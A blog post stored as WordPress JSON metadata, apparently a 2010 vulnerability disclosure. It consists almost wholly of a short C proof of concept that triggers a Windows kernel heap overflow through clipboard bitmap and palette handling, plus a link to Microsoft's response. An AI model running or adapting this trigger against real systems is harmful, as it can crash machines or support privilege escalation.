{"id":255,"date":"2010-08-06T11:02:23","date_gmt":"2010-08-06T13:02:23","guid":{"rendered":"http:\/\/www.ragestorm.net\/blogs\/?p=255"},"modified":"2010-08-11T05:18:15","modified_gmt":"2010-08-11T07:18:15","slug":"heapo-forever","status":"publish","type":"post","link":"https:\/\/www.ragestorm.net\/blogs\/?p=255","title":{"rendered":"Heapos Forever"},"content":{"rendered":"

There are still hippos around us, beware:
\n\"heapo\"<\/p>\n

Kernel heap overflow.<\/p>\n

\r\nDEVMODE dm = {0};\r\ndm.dmSize  = sizeof(DEVMODE);\r\ndm.dmBitsPerPel = 8;\r\ndm.dmPelsWidth = 800;\r\ndm.dmPelsHeight = 600;\r\ndm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;\r\nChangeDisplaySettings(&dm, 0);\r\n\r\nBITMAPINFOHEADER bmih = {0};\r\nbmih.biClrUsed = 0x200;\r\n\r\nHGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);\r\nmemcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));\r\nGlobalUnlock(h);\r\n\r\nOpenClipboard(NULL);\r\nSetClipboardData(CF_DIBV5, (HANDLE)h);\r\nCloseClipboard();\r\n\r\nOpenClipboard(NULL);\r\nGetClipboardData(CF_PALETTE);<\/pre>\n

\n[Update, 11th Aug]: Here is MSRC response<\/a>.
\n<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"
There are still hippos around us, beware: Kernel heap overflow. DEVMODE dm = {0}; dm.dmSize = sizeof(DEVMODE); dm.dmBitsPerPel = 8; dm.dmPelsWidth = 800; dm.dmPelsHeight = 600; dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL; ChangeDisplaySettings(&dm, 0); BITMAPINFOHEADER bmih = {0}; bmih.biClrUsed = 0x200; HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000); memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih)); GlobalUnlock(h); OpenClipboard(NULL); SetClipboardData(CF_DIBV5, (HANDLE)h); CloseClipboard(); […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":""},"categories":[5,19,13,17,7],"tags":[36,38,37],"jetpack_featured_media_url":"","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbWKd-47","_links":{"self":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/255"}],"collection":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=255"}],"version-history":[{"count":6,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/255\/revisions"}],"predecessor-version":[{"id":262,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/255\/revisions\/262"}],"wp:attachment":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=255"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}